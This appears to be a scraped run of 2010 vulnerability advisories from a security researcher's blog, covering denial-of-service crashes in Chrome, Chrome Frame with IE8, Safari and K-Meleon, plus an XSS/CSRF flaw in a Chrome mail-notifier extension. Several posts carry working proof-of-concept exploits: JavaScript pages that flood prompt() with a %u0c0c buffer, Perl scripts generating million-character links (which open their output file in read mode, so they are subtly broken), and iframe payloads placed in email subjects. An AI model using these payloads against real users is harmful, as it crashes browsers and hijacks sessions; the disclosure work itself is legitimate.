User Agent Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/533.4 <br />
(KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4<br />
Command Line /usr/lib/chromium-browser/chromium-browser<br />
<br />
In al cases Chrome is minimized and denies the access to <br />
"window manager button" and we can´t no change beetwen applications<br />
that we have open.<br />
<br />
<br />
##################<br />
Windows 7 32 bits<br />
###################<br />
<br />
Google Chrome 5.0.375.86 (Build oficial 49890)<br />
on windows 7 ultimate fully patched.<br />
<br />
It causes a DoS in chrome and a DoS in IE8 when <br />
exploit it across Google Chrome Frame.<br />
<br />
###############<br />
Debian 2.6.26<br />
###############<br />
<br />
Google Chrome 6.0.472.25 (Build oficial 55113) devWebKit 534.3<br />
V82.2.24.11<br />
User Agent Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit 534.3<br />
<br />
in all cases Debian Closes all chrome Windows.( Chrome Crash)<br />
<br />
<br />
####################<br />
Proof Of Concepts<br />
####################<br />
<br />
this PoC is for testing in win7 32 bits, chrome <br />
and chrome frame in conjuncion with ie8 that causes <br />
a DoS in ie8 <br />
<br />
#############################<br />
<meta http-equiv="X-UA-Compatible" content="chrome=1"><br />
<h1> wait 10 or 11 seconds :)</h1><br />
<script><br />
<br />
function do_buffer(payload, len) {<br />
while(payload.length < (len * 2)) payload += payload;<br />
payload = payload.substring(0, len);<br />
return payload;<br />
}<br />
function DoS()<br />
{<br />
var buffer = do_buffer(unescape('%u0c0c%u0c0c'), 38000);<br />
prompt(buffer);<br />
}<br />
setTimeout('DoS()',1000);<br />
</script><br />
################# EOF ###################<br />
<br />
This second PoC is for test in Linux or in Mac OS X<br />
<br />
#######################################<br />
<h1> wait 10 or 11 seconds :)</h1><br />
<script><br />
<br />
function do_buffer(payload, len) {<br />
while(payload.length < (len * 2)) payload += payload;<br />
payload = payload.substring(0, len);<br />
return payload;<br />
}<br />
function DoS()<br />
{<br />
var buffer = do_buffer(unescape('%u0c0c%u0c0c'), 50000);<br />
prompt(buffer);<br />
}<br />
setTimeout('DoS()',1000);<br />
</script><br />
################# EOF ###################<br />
<br />
############<br />
References<br />
############<br />
related vuln:<br />
http://lostmon.blogspot.com/2010/07/ie8-on-windows-7-32-bits-unspecified.html<br />
<br />
Google chrome bugtrack:<br />
http://code.google.com/p/chromium/issues/detail?id=47617<br />
<br />
################### €nd ###################<br />
<br />
Thnx To Climbo for his patience and support.<br />
<br />
atentamente:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--<br />
La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-36209861201760653232010-08-04T08:35:00.002-07:002010-08-04T08:38:08.893-07:00Safari for windows Long link DoS############################################<br />
Safari for windows Long link DoS<br />
Vendor URL:http://www.apple.com/safari/<br />
Advisore:http://lostmon.blogspot.com/2010/08/safari-for-windows-long-link-dos.html<br />
Vendor notified:Yes exploit available: YES<br />
############################################<br />
<br />
Safari is prone vulnerable to Dos with a very long Link...<br />
This issue is exploitable via web links like <a href="very long URL"><br />
click here</a> or similar vectors. Safari fails to render the link <br />
and it turn Frozen resulting in a Denial of service condition.<br />
<br />
#################<br />
Versions Tested<br />
#################<br />
<br />
I have tested this issue in win xp sp3 and a windows 7 fully pached.<br />
<br />
Win XP sp3:<br />
<br />
Safari 5.0.X vulnerable<br />
Safari 4.xx vulnerable <br />
<br />
windows 7 Ultimate:<br />
<br />
Safari 5.0.X vulnerable<br />
Safari 4.xx vulnerable <br />
<br />
############<br />
References<br />
############<br />
<br />
Discovered: 29-07-2010<br />
vendor notify:31-07-2010<br />
Vendor Response:<br />
Vendor patch:<br />
<br />
####################<br />
Proof Of Concept<br />
####################<br />
<br />
#######################################################################<br />
#!/usr/bin/perl<br />
# safari & k-meleon Long "a href" Link DoS<br />
# Author: Lostmon Lords Lostmon@gmail.com http://lostmon.blogspot.com<br />
# Safari 5.0.1 ( 7533,17,8) and prior versions Long link DoS<br />
# generate the file open it with safari wait a seconds<br />
######################################################################<br />
<br />
$archivo = $ARGV[0];<br />
if(!defined($archivo))<br />
{<br />
<br />
print "Usage: $0 <archivo.html>\n";<br />
<br />
}<br />
<br />
$cabecera = "<html>" . "\n";<br />
$payload = "<a href=\"about:neterror?e=connectionFailure&c=" . "/" x 1028135 . "\">click here if you can :)</a>" . "\n";<br />
$fin = "</html>";<br />
<br />
$datos = $cabecera . $payload . $fin;<br />
<br />
open(FILE, '<' . $archivo);<br />
print FILE $datos;<br />
close(FILE);<br />
<br />
exit;<br />
<br />
################## EOF ######################<br />
<br />
##############<br />
Related Links<br />
##############<br />
<br />
vendor bugtracker : http://kmeleon.sourceforge.net/bugs/viewbug.php?bugid=1251<br />
Posible related Vuln: https://bugzilla.mozilla.org/show_bug.cgi?id=583474<br />
Test Case : https://bugzilla.mozilla.org/attachment.cgi?id=461776<br />
<br />
###################### €nd #############################<br />
<br />
Thnx to Phreak for support and let me undestanding the nature of this bug<br />
thnx to jajoni for test it in windows 7 X64 bits version.<br />
<br />
atentamente:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--<br />
La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-15752782263271041052010-08-04T08:18:00.002-07:002010-08-04T08:23:39.743-07:00K-Meleon for windows about:neterror Stack Overflow DoS############################################<br />
K-Meleon for windows about:neterror Stack Overflow DoS<br />
Vendor URL:http://kmeleon.sourceforge.net/<br />
Advisore:http://lostmon.blogspot.com/2010/08/k-meleon-for-windows-aboutneterror-dos.html<br />
Vendor notified:Yes exploit available: YES<br />
############################################<br />
<br />
K-Meleon is an extremely fast, customizable, lightweight web browser<br />
based on the Gecko layout engine developed by Mozilla which is also <br />
used by Firefox. K-Meleon is free, open source software released under<br />
the GNU General Public License and is designed specifically for <br />
Microsoft Windows (Win32) operating systems.<br />
<br />
K-Meleon is prone vulnerable to crashing with a very long URL...<br />
Internal web pages like about:neterror does not limit the amount of <br />
chars that a user put in 'c' 'd' params and them if we compose a <br />
malformed url the browser can be chash easy.This issue is exploitable<br />
via web links like <a href="http://www.blogger.com/very%20long%20URL">click here</a> or via <br />
window.location.replace('very long url') or similar vectors.<br />
<br />
#################<br />
Versions Tested<br />
#################<br />
<br />
I have tested this issue in win xp sp3 and a windows 7 fully pached.<br />
<br />
Win XP sp3:<br />
K-meleon 1.5.3 & 1.5.4 Vulnerables.(crashes )<br />
K-Meleon 1.6.0a4 Vulnerables.(crashes)<br />
<br />
windows 7 Ultimate:<br />
K-meleon 1.5.3 & 1.5.4 Vulnerables.(crashes)<br />
K-Meleon 1.6.0a4 Vulnerables.(crashes)<br />
<br />
############<br />
References<br />
############<br />
<br />
Discovered: 29-07-2010<br />
vendor notify:31-07-2010<br />
Vendor Response:<br />
Vendor patch:<br />
<br />
########################<br />
ASM code stack overflow<br />
########################<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEN6J-j0JQKVpMWiCMD0NDjlCN6b90yygIVDBBOHVTGzg0eIqxgxtKWnqI7zQ83hblLq7uf4RQJW8Gd3UyydbKm1OQjnj3B_BAelwA3pTTMNYRAzVY7DbaNsI88YRLoR9stqgo/s1600/k-meleon.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="125" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEN6J-j0JQKVpMWiCMD0NDjlCN6b90yygIVDBBOHVTGzg0eIqxgxtKWnqI7zQ83hblLq7uf4RQJW8Gd3UyydbKm1OQjnj3B_BAelwA3pTTMNYRAzVY7DbaNsI88YRLoR9stqgo/s200/k-meleon.png" width="200" /></a></div>################ <br />
#Proof Of Concept <br />
################ <br />
<br />
#######################################################################<br />
#!/usr/bin/perl<br />
# k-meleon Long "a href" Link DoS<br />
# Author: Lostmon Lords Lostmon@gmail.com http://lostmon.blogspot.com<br />
# k-Meleon versions 1.5.3 & 1.5.4 internal page about:neterror DoS<br />
# generate the file open it with k-keleon click in the link and wait a seconds<br />
######################################################################<br />
<br />
$archivo = $ARGV[0];<br />
if(!defined($archivo))<br />
{<br />
<br />
print "Usage: $0 <archivo.html>\n";<br />
<br />
}<br />
<br />
$cabecera = "<html>" . "\n";<br />
$payload = "<a href=\"about:neterror?e=connectionFailure&c=" . "/" x 1028135 . "\">click here if you can :)</a>" . "\n";<br />
$fin = "</html>";<br />
<br />
$datos = $cabecera . $payload . $fin;<br />
<br />
open(FILE, '<' . $archivo);<br />
print FILE $datos;<br />
close(FILE);<br />
<br />
exit;<br />
<br />
################## EOF ######################<br />
<br />
##############<br />
Related Links<br />
##############<br />
<br />
vendor bugtracker : http://kmeleon.sourceforge.net/bugs/viewbug.php?bugid=1251<br />
Posible related Vuln: https://bugzilla.mozilla.org/show_bug.cgi?id=583474<br />
Test Case : https://bugzilla.mozilla.org/attachment.cgi?id=461776<br />
<br />
###################### €nd #############################<br />
<br />
Thnx to Phreak for support and let me undestanding the nature of this bug<br />
thnx to jajoni for test it in windows 7 X64 bits version.<br />
<br />
atentamente:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--<br />
La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-7127686386080026322010-07-13T07:48:00.001-07:002010-07-13T07:51:46.431-07:00IE8 On windows 7 32 bits unspecified DoS##########################################<br />
IE8 On windows 7 32 bits unspecified DoS<br />
Vendor URL:http://www.microsoft.com<br />
Advisore:http://lostmon.blogspot.com/2010/07/ie8-on-windows-7-32-bits-unspecified.html<br />
Vendor Notify:YES Vendor confirmed:YES <br />
EXPLOIT:Private<br />
###########################################<br />
<br />
A posible flaw exits in Internet explorer 8<br />
on windows 7 32-bits ,that can cause a remote <br />
denial of service from a malformed web page.<br />
<br />
This issue is tiggered when IE8 try to render<br />
Modal app prompt in conjuncion with thirds appz that <br />
uses recurses from IE8 and try to render text inputs<br />
it is a posible GDI text-rendering<br />
APIs bug or or DrawText() functions involved.<br />
<br />
When the victim visit a malformed web page, an close the 2nd<br />
appz, this appz turns unstable and needs to close , and then <br />
when IE8 try to restore<br />
the tab ,it los the focus from application and it results in<br />
a denial of service to this window , because we can't click <br />
in any bar , in any button or do some action in this window,<br />
ie8 aparently is frozen.<br />
<br />
After several test this issue only is reproducible in win7 32 bits<br />
<br />
I have a exploit or PoC for this issue , but it's<br />
private at this time :)<br />
<br />
Solution:<br />
Microsoft know that as a stability bug and they add it <br />
for consideration in a future version to address it.<br />
<br />
#################### €nd ##########################<br />
<br />
Thnx for your time !!!<br />
atentamente:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--<br />
La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-20525046171012963252010-06-18T12:09:00.003-07:002010-06-18T12:10:21.085-07:00Google Services Notifier Chrome extension XSS/CSRF######################################<br />
Google Services Notifier Chrome extension XSS/CSRF<br />
extension:https://chrome.google.com/extensions/detail/dmgbflokapnkfnegeigclohhplnflgie<br />
advisore:http://lostmon.blogspot.com/2010/06/google-services-notifier-chrome.html<br />
Exploit available:yes vendor notify : NO<br />
#######################################<br />
<br />
So in this case "Notifier for Google Wave Chrome" <br />
has a flaw that allow attackers to make XSS style attacks.<br />
<br />
All extensions runs over his origin and no have way to altered data from extension <br />
or get sensitive data like , email account or password etc..<br />
<br />
if we look how many users have instaled this extension =><br />
https://chrome.google.com/extensions/detail/dmgbflokapnkfnegeigclohhplnflgie<br />
109 users have instaled it (WoW)<br />
<br />
############<br />
explanation<br />
############<br />
<br />
Google Services Notifier allows users to view wen they have a new wave and<br />
view a preview of it ....<br />
<br />
"Keep you update with Google services like Google Mail,Blogger,Reader,YouTube,<br />
Google Docs, Google Wave etc. More services will be added soon."<br />
<br />
If a attacker compose a new mail with html or javascript code in <br />
subject & send it to victim´s the code is executed wen Victim´s click in the<br />
extension to view a preview of mail.<br />
<br />
So for exploit we need to compose a "special" mail<br />
for example if we put directly in the mail subject a iframe like<br />
"><iframe src="javascript:alert(location.href);"></iframe><br />
in the two cases the alert is executed wen try to preview the mail <br />
with the extension :) it is executed in context location.href value is<br />
"about:blank"<br />
<br />
For example send a mail With a logout acction in google wave in body<br />
"><iframe src="https://wave.google.com/wave/logout"></iframe><br />
it closes the sesion on google wave , this is a CSRF.<br />
<br />
######################€nd#################################<br />
.<br />
Thnx for your time !!!<br />
atentamente:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--<br />
La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.com